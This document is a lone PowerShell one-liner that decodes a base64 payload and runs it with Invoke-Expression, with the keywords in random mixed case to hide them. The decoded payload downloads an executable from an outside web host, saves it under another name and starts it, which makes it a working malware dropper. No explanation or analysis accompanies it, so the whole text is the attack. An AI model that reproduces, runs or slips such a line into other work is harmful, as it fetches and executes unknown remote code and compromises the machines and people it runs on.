iex([sySTeM.text.EnCodInG]::uTF8.gETStRing([sysTEm.conveRt]::fROmbaSE64STring('CihOZXctT2JqZWN0IFN5U1RFbS5OZXQud0ViY2xJZW5UKS5Eb1dOTE9hREZpbGUoJ2h0dHA6Ly93b3JsZG5pdC5jb20vY29tLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit

